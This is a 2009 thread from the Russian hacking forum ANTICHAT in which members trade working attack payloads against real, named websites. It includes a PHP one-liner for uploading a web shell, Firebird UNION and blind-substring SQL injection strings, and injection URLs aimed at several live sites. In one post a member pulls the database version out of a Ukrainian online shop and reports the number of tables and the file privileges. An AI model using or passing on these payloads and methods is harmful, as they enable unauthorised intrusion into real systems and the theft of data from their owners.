HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5411  
Старый 10.02.2009, 20:23
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
Цитата:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
2. ковычка там не нужна и колонки в запросе две

Gorev, обе переменные участвуют в нескольких запросах поэтому связка с union там врятли прокатит, вообще говоря, т.к. колонка в одном из запросов одна выглядело бы примерно так -1+union+select+cast(user+as+char(n))+from+rdb$user _privileges/* причем тип данных (as char/int/etc(n)) должен совпадать с изначальным в первой выборке, если посимвольным брутом надо покапаться в мануалах найти функцию которая работает с выражениями/строками, особо не вдавался в этот вопрос
/add посмотрел пока писал сообщение посимвольно будет выглядеть примерно так:
+and+substring((select+rdb$user+from+rdb$user_priv ileges+здесь_какой_нибудь_подд ерживаемый_лимит(например rows))+from+1+for+0)='a'/*
все с точностью прочитанного нескольками минутами назад мануала, надо бы поставить, посмотреть может наврал где-то
 
Ответить с цитированием

  #5412  
Старый 10.02.2009, 21:00
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами: 10139366

Репутация: 1502


По умолчанию

Gorev, ну и ещё - тебе надо умудриться не только подобрать количество колонок в union, но и их типы) ибо из мануала
Цитата:
<...>Firebird is very strict with datatypes, and when you have different datatype in queries that make up the UNION it throws an error. It can happen even if difference is something trivial like CHAR(5) vs CHAR(6). It also happens for decimal and double datatypes, and (one of the most annoying) when you put NULL or zero.
Цитата:
Firebird 2 has much better type coercion as it detects the largest datatype, and allows smaller ones to fit automatically, i.e. if you have CHAR(5) in one query and CHAR(6) in other, it will automatically set view's column to be CHAR(6). Please note that datatypes have to be compatible for this to work (for example, you cannot union a Blob and Decimal column).
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #5413  
Старый 10.02.2009, 22:13
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--

Такая же хня,скуля там есть.
 
Ответить с цитированием

  #5414  
Старый 10.02.2009, 22:31
downloader
Новичок
Регистрация: 12.09.2008
Сообщений: 13
С нами: 9295494

Репутация: 1
По умолчанию

Цитата:
Сообщение от l1ght  
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
Код:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
freeBSD 6.2

sorry но не понял как делать через аплоад я ещё навичок в этом деле

Последний раз редактировалось downloader; 10.02.2009 в 22:41..
 
Ответить с цитированием

  #5415  
Старый 10.02.2009, 23:18
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Цитата:
http://dl.kimep.kz/course/view.php?id=-114
Не могу найти скулю, помогите плз...
 
Ответить с цитированием

  #5416  
Старый 10.02.2009, 23:25
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Включена фильтрация кавычек, вряд скули там будут.
 
Ответить с цитированием

  #5417  
Старый 10.02.2009, 23:45
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Цитата:
Сообщение от Ershik  
Включена фильтрация кавычек, вряд скули там будут.
что можешь посоветовать?
 
Ответить с цитированием

  #5418  
Старый 11.02.2009, 05:30
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

искать уязвимости. что ещё советовать-то?) Инъекции в ом параметре нет
 
Ответить с цитированием

  #5419  
Старый 11.02.2009, 05:50
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами: 9107354

Репутация: 122
По умолчанию

где тут вывод???
http://eromarket.com.ua/index.php?productID=-99999%20union%20select%20version()/*
 
Ответить с цитированием

  #5420  
Старый 11.02.2009, 06:07
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Забавная у тебя там инъекция, без минуса если:

Код:
http://eromarket.com.ua/index.php?productID=99999
Цитата:
Извините, запрашиваемый документ не был найден на сервере
Код:
http://eromarket.com.ua/index.php?categoryID=15+and+substring(version(),1,1)=5
5 ветка, похоже слепая, принтабельных колонок или в исходниках ничего не увидел

ан нет, именно в исходниках вывод и есть

5.0.45-log

Код:
http://eromarket.com.ua/index.php?categoryID=15+union+select+version()/*
Цитата:
<meta name="Description" content="Секс-шоп - EROmarket - Интернет-магазин, секс, sex, sex-shop, sexshop, интим,секс шоп, нижнее белье, эротические, эротические, белье, магазины, товары, духи, эро, bdsm, ero, эротика, возбудитель Разное Tongue Tingler Vibro E-Z Rider 5.0.45-log, Ukraine, Украина, Kiev, Киев">
80 таблиц. Успехов. File_priv нету

Последний раз редактировалось Pashkela; 11.02.2009 в 06:21..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.